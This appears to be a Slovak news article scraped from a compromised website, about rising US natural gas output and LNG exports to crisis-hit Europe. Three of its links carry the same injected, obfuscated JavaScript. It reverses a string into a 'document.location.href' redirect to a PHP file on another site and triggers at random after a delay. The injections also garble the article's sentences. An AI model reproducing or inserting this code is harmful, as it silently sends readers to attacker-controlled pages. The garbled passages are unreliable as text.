Ťažba zemného plynu v Spojených štátoch v tomto roku mierne prekročí 98 miliárd kubických stôp denne.

Vývoz skvapalneného zemného plynu z USA vzrastie v budúcom roku o viac ako 13 %

Skvapalnený zemný plyn sa tento rok stal veľmi žiadanou komoditou. A vzhľadom na pretrvávajúcu energetickú krízu v Európe to nebude inak ani v roku 2023, odhaduje americká Agentúra pre energetické informácie (EIA).

Ako bude vyzerať ťažba zemného plynu v USA?

Ťažba $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodavat-zemny-plyn-do-europy/“ target=“_blank“ rel=“noopener“ title=““>zemného plynu v Spojených štátoch v tomto roku mierne prekročí 98 miliárd kubických stôp denne. Podľa odhadov Americkej agentúry pre energetické informácie sa v budúcom roku dokonca priblíži k 100 miliardám. V priebehu dvoch rokov sa produkcia tejto komodity v $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domaci-dopyt/“ target=“_blank“ rel=“noopener“ title=““>USA zvýši približne o 1,7 %. Hoci ide o veľmi malý nárast, vývoz kvapalného zemného plynu sa podľa odhadov agentúry výrazne zvýši.

LNG si nájde významných zákazníkov v Európe

Zatiaľ čo v minulom roku USA vyviezli v priemere 9,76 miliardy kubických stôp denne, v tomto roku sa vývoz LNG zo Spojených štátov zvýši na približne 10,85 miliardy a v budúcom roku na 12,33 miliardy kubických stôp denne. To predstavuje medziročný nárast o viac ako 13 % a do roku 2021 sa vývoz LNG z USA zvýši o viac ako štvrtinu. Hlavným odbytiskom budú krajiny Európskej únie, ktoré čelia energetickej kríze v dôsledku vojenského vpádu $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do-platobnej-neschopnosti-je-umelo-vyvolana-brani-sa-moskva/“ target=“_blank“ rel=“noopener“ title=““>Ruskej federácie na Ukrajinu.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *